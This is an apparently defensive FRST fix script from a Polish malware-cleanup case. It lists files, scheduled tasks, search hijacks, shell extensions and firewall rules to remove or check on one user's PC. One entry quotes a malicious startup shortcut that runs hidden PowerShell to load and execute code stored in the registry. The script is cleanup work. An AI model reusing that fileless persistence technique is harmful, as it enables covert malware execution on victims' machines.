CloseProcesses:
CreateRestorePoint:
EmptyTemp:
VirusTotal: C:\Users\Artur\AppData\Roaming\UIiY.dll
VirusTotal: C:\Users\Artur\AppData\Roaming\inst.exe
VirusTotal: C:\Windows\SysWOW64\srvany.exe
Startup: C:\Users\Artur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iexplorer.lnk [2019-01-12]
ShortcutAndArgument: iexplorer.lnk -> C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe => -W Hidden -Exec -nop $t=Get-ItemProperty -Path 'HKCU:\Software\Classes\mssccfile' -Name t;IEX $t.t;
GroupPolicy: Ograniczenia ? <==== UWAGA
Task: {11E65B93-AEF4-4A3E-B690-5AEE99FF89FE} - System32\Tasks\Opera scheduled Autoupdate 1449506344 => C:\Program Files (x86)\Opera\launcher.exe [1351192 2020-02-05] (Opera Software AS -> Opera Software)
Task: {3A3EC64D-CA0E-4743-BF9C-913544FB6EB2} - System32\Tasks\Maxthon Update => C:\Program Files (x86)\Maxthon\Bin\Maxthon.exe
Task: {46751A70-7B7E-430F-B28D-9EAD02CF67DD} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\overseer.exe [1873288 2019-09-19] (AVAST Software s.r.o. -> AVAST Software)
Task: {DD137531-3FE2-4DE0-860A-369B47E2A215} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku <==== UWAGA
Task: {E54C8E60-6055-4D1F-A47D-C3D181CC533A} - \Microsoft\Windows\UNP\RunCampaignManager -> Brak pliku <==== UWAGA
Tcpip\..\Interfaces\{f0e87d3f-da7c-4cf4-91a0-eedb69d6c765}: [DhcpNameServer] 192.168.1.1
HKU\S-1-5-21-994253839-1061340512-3705332430-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.gazeta.pl/0,0.html?p=190
HKU\S-1-5-21-994253839-1061340512-3705332430-1001\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
SearchScopes: HKU\S-1-5-21-994253839-1061340512-3705332430-1001 -> DefaultScope {1BBAAAD7-8B68-4BB1-8882-366A0EF05A68} URL = hxxp://www.nav-pl.com/search?q={searchTerms}
SearchScopes: HKU\S-1-5-21-994253839-1061340512-3705332430-1001 -> {1BBAAAD7-8B68-4BB1-8882-366A0EF05A68} URL = hxxp://www.nav-pl.com/search?q={searchTerms}
FF Extension: (Brak nazwy) - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [nie znaleziono]
S2 KMService; C:\Windows\SysWOW64\srvany.exe [8192 2015-12-07] () [Brak podpisu cyfrowego]
S3 LeCrud64; \??\C:\PROGRA~3\Lenovo\SYSTEM~1\SESSIO~1\REPOSI~1\9SJY9C~1\LeCrud64.sys [X]
2020-02-07 11:45 - 2019-06-17 20:47 - 000003982 _____ C:\WINDOWS\system32\Tasks\Opera scheduled Autoupdate 1449506344
CustomCLSID: HKU\S-1-5-21-994253839-1061340512-3705332430-1001_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\Artur\AppData\Local\Microsoft\OneDrive\17.3.7074.1023\amd64\FileSyncShell64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-994253839-1061340512-3705332430-1001_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\Artur\AppData\Local\Microsoft\OneDrive\17.3.7074.1023\amd64\FileSyncShell64.dll => Brak pliku
CustomCLSID: HKU\S-1-5-21-994253839-1061340512-3705332430-1001_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\Artur\AppData\Local\Microsoft\OneDrive\17.3.7074.1023\amd64\FileSyncShell64.dll => Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku
ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> Brak pliku
ShellIconOverlayIdentifiers-x32: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> Brak pliku
ContextMenuHandlers1: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> Brak pliku
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
ContextMenuHandlers1: [ANotepad++64] -> {B298D29A-A6ED-11DE-BA8C-A68E55D89593} => -> Brak pliku
ContextMenuHandlers1: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
ContextMenuHandlers3: [{4A7C4306-57E0-4C0C-83A9-78C1528F618C}] -> {4A7C4306-57E0-4C0C-83A9-78C1528F618C} => -> Brak pliku
ContextMenuHandlers4: [ FileSyncEx] -> {CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B} => -> Brak pliku
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => -> Brak pliku
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> Brak pliku
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => -> Brak pliku
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} => -> Brak pliku
AlternateDataStreams: C:\ProgramData\TEMP:7F4E393D [113]
HKU\S-1-5-21-994253839-1061340512-3705332430-1001\Software\Classes\exefile: <==== UWAGA
FirewallRules: [{143AE15F-F901-4B1C-B6E3-E963D6B43318}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{148D9675-00B5-46EA-8132-E44A66015CD6}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{73AC28AF-FE5C-4E49-A51B-E7D05E8A978B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{F5D9BE33-67F0-4C9C-B02F-64881FE4E229}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{2A8C84D9-02F3-4585-9C24-574F6497784B}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{2494898E-6C45-4A5F-AC44-448B6BC0914A}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{40F81793-E5FB-4E64-ADAE-E4B82FCC55B4}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{4A3E13A7-9E58-468A-8D41-C8146E4777CF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.109.383.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [UDP Query User{B777C86D-04F4-473F-8FF0-B731A114D43E}D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku
FirewallRules: [TCP Query User{351788B2-828A-469F-A936-00FD57A125FF}D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.108.439.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku
FirewallRules: [{32DE452E-6269-4B93-83DD-8C21580348CE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{F4D7340E-3A20-469C-8163-E8B6923F65C0}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{3011BF6E-48F8-4D4D-8A06-AA7B4CEC1C14}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{CD5C13DE-DD67-4BB5-B345-1226B29103CC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{6D6DC441-8FF7-44C1-A9F2-CC0B5A8046C7}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{68B76526-C914-4856-AB7D-E0FDDAAE9BAF}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{61A75FC0-E97E-419B-A95D-1D2CCFF9B7FE}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [{07EC8C52-C961-48A7-AA36-7CF6790C0AEC}] => (Allow) C:\Program Files\WindowsApps\SpotifyAB.SpotifyMusic_1.108.439.0_x86__zpdnekdrzrea0\Spotify.exe Brak pliku
FirewallRules: [TCP Query User{39270B4C-453F-4A7A-80C2-91E30E623231}C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe] => (Allow) C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe Brak pliku
FirewallRules: [UDP Query User{12A5F006-9F6D-405F-9CFD-39333BBD78C4}C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe] => (Allow) C:\users\artur\desktop\ip01r_01h_06r_26h_cd\serach tool\ipcam3.6.exe Brak pliku
FirewallRules: [TCP Query User{104FB589-0287-435D-AB45-3BEB89392A4F}D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku
FirewallRules: [UDP Query User{5FA0BE4F-974F-40C7-A1FE-BA0CC402518B}D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe] => (Allow) D:\windowsapps\spotifyab.spotifymusic_1.109.383.0_x86__zpdnekdrzrea0\spotify.exe Brak pliku
FirewallRules: [{2A5C14AD-0850-461E-A370-23E9417AEA3F}] => (Allow) D:\WindowsApps\MUSIXMATCH.LYRICS_3.7.3843.0_x86__7gejyv32yt3te\app\Musixmatch.exe Brak pliku
FirewallRules: [{A9E24036-700B-4970-ACEC-C810DF432B9B}] => (Allow) D:\WindowsApps\MUSIXMATCH.LYRICS_3.7.3843.0_x86__7gejyv32yt3te\app\Musixmatch.exe Brak pliku
FilesInDirectory: C:\Users\Artur\AppData\Roaming\*.exe;*.dll;*.ini
Hosts:
RemoveProxy